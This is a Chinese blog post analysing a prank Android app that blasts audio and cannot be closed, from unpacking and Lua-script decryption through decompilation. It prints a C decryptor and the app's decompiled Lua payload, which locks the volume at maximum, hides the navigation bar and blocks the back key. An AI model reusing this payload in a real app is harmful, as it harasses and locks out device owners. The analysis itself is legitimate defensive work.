- 1TabLayout 定制颜色导致编译失败_aapt: error: 'fill parent' is incompatible with at
- 2MQ面试题整理
- 3ICCV 2019 | 沉迷AI换脸?不如来试试“AI换衣”
- 4Verilog有符号和无符号运算设计分析_verilog除法取整
- 5啃透美团分布式进阶技术手册,终入美团定L8_美团l8
- 6ubuntu16下利用loam_livox建图_loam_livox 建图
- 7大模型携手AI原生应用融入全产业场景_千帆大模型场景应用
- 8SSH 指令、参数、示例_ssh命令参数
- 9(含代码)利用NVIDIA Triton加速Stable Diffusion XL推理速度_sd推理引擎
- 10GPT提示词系统学习-第三课-规范化提示让样本走在提示词前_gpt提示语 qa问答
[Android] 「送给最好的 TA」App逆向与Lua脚本解密实例_安卓脚本解密
赞
踩
0x00 事由
最近一些群里出现了会以最大音量外放音频且无法退出的恶搞Android App,造成了一些不好的影响。恰好借这个机会尝试通过逆向工程分析其原理,同时这个App也使用了Lua脚本并进行了加密,也借此机会实践一下Lua脚本解密。
0x01 工具
- Java 运行时环境
- Apktool
- unluac
- IDA
- C/C++ 编译器
下文中会给出Lua脚本的解密代码,需要使用 GCC/Clang 等C/C++ 编译器进行编译后执行。
0x02 基本结构
我们首先使用Apktool对其进行解包,假设App的文件名为App.apk
java -jar apktool.jar d App.apk
- 1
等待执行完后,打开解包生成的App文件夹
我们需要关注其中几个文件(夹)
assets,存放资源文件,包含Lua脚本lua和音频文件mp3lib,本地库(Native Library)文件夹,包含编译后的本地代码(Native Code)的so文件smail,存放smail文件,包含Dalvik字节码,是对App的Java代码反向成中立字节码的结果AndroidManifest.xml,包含App的信息
查看AndroidManifest.xml的内容,可以发现以下样本App信息
- App名为
送给最好的TA - 包名为
com.sgzh.dt
0x03 分析Java部分
进入smail,我们可以看到Java部分的代码结构,可以看出存在com.androlua、com.nirenr、com.luajava等包名,搜索相关项目可以发现App的大部分代码均来自于AndroLua_pro。
AndroLua_pro是一个使用Lua编写Android应用的项目,换而言之,Java部分极有可能并不是应用的主体部分,重要操作很有可能会写在Lua中。
除了AndroLua_pro的代码外,我们还发现了com.b.a.a com.b.a.b这两个经过混淆的包名,经过查证得知里面的代码来源于TextWarrior。
我们得知其Java代码基本都是来源于现有项目,无太大分析价值,我们将分析重点放于Lua脚本上。
0x04 分析C部分
在进入Lua部分前,我们使用文本编辑器查看assets文件中的init.lua和main.lua,会发现他们并不是Lua代码,也不是编译后的luac,可以得知Lua脚本被加密了,我们需要先对其进行解密。
AndroLua_Pro所使用的Lua工具LuaJava会加载依赖库libluajava.so,我们使用IDA打开这个文件。LuaJava会使用luaL_loadbuffer或者luaL_loadbufferx函数对Lua脚本进行加载,这个函数也是一个加入Lua脚本解密代码的常见位置,我们在IDA中找到这一函数,并使用自带插件对其进行反编译,可以看到如下内容
(上图为方便阅读,已反混淆变量名)
与AndroLua_pro的原始代码比较,可以发现加入了Lua脚本解密的代码,我们可以参考这一代码,使用C语言编写一个简单的解密工具
#include <stdio.h> #include <stdlib.h> #include <string.h> unsigned char *decrypt(const unsigned char *buff, size_t size) { unsigned char *buff1 = (unsigned char *) malloc(size); buff1[0] = 27; int t = 0; for (int i = 1; i < size; i++) { t += size; buff1[i] = buff[i] ^ (t + ((unsigned int) (((unsigned long) (-2139062143LL * t) >> 32) + t) >> 7) + ((signed int) (((unsigned long) (-2139062143LL * t) >> 32) + t) < 0)); } return buff1; } unsigned char buff[20480]; int main(int argc, char *argv[]) { char filename[20] = "main.lua"; if (argc == 2) strcpy(filename,argv[1]); printf("File name: %s \n", filename); FILE *fp = fopen(filename, "rb"); size_t size = 0; size = fread(buff, sizeof(unsigned char), 20480, fp); printf("File size: %ld \n", size); unsigned char *res = decrypt(buff, size); strcat(filename, "c"); FILE *fp1 = fopen(filename, "wb"); fwrite(res, sizeof(unsigned char), size, fp1); printf("Output: %s", filename); return 0; }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
编译这一代码为decrypt.exe,并拷贝到assets文件夹下,执行以下命令来解密init.lua和main.lua
decrypt init.lua
decrypt main.lua
- 1
- 2
解密后的文件为init.luac与main.luac,使用文本编辑器观察可以发现其仍然不是Lua代码,而是编译后的luac文件,我们还需要对其进行反编译。
0x05 分析Lua部分
使用unluac可以对luac文件进行反编译,执行以下指令
java -jar unluac.jar init.luac > init-decomp.lua
java -jar unluac.jar main.luac > main-decomp.lua
- 1
- 2
通过反编译,我们可以得到真正的Lua代码文件init-decomp.lua和main-decomp.lua。
查看init-decomp.lua,代码的用途是声明应用基本信息
local L0_0 appname = "\233\128\129\231\187\153\230\156\128\229\165\189\231\154\132TA" appver = "1.0" appcode = "10" appsdk = "15" path_pattern = "" packagename = "com.sgzh.dt" theme = "Theme_DeviceDefault_Dialog_NoActionBar_MinWidth" app_key = "" app_channel = "" developer = "" description = "" debugmode = false L0_0 = { "INTERNET", "WRITE_EXTERNAL_STORAGE" } user_permission = L0_0
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
执行具体功能的代码位于main-decomp.lua
require("import") import("android.app.*") import("android.os.*") import("android.widget.*") import("android.view.*") import("android.view.View") import("android.content.Context") import("android.media.MediaPlayer") import("android.media.AudioManager") import("com.androlua.Ticker") activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI) activity.getDecorView().setSystemUiVisibility(View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_IMMERSIVE) m = MediaPlayer() m.reset() m.setDataSource(activity.getLuaDir() .. "/0.mp3") m.prepare() m.start() m.setLooping(true) ti = Ticker() ti.Period = 10 function ti.onTick() activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI) activity.getDecorView().setSystemUiVisibility(View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_IMMERSIVE) end ti.start() function onKeyDown(A0_0, A1_1) if string.find(tostring(A1_1), "KEYCODE_BACK") ~= nil then activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI) end return true end
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
具体的操作有以下内容
- 将系统音量调至最大
- 隐藏系统导航栏,并进入沉浸模式(全屏)
- 每10tick,重复以上步骤使得无法主动调低音量
- 循环播放音频文件
0.mp3 - 阻止使用返回键
0x06 结语
虽然这个App是以恶搞为目的,可能App作者并不存在主观恶意,但是这种行为并不值得提倡,经过QQ群的传播,和病毒已经没有本质上的差距,希望以后可以不再发生这样的事情。
对于用户来说,切记不要安装未知应用,这是保护自己和手机的最根本的手段。
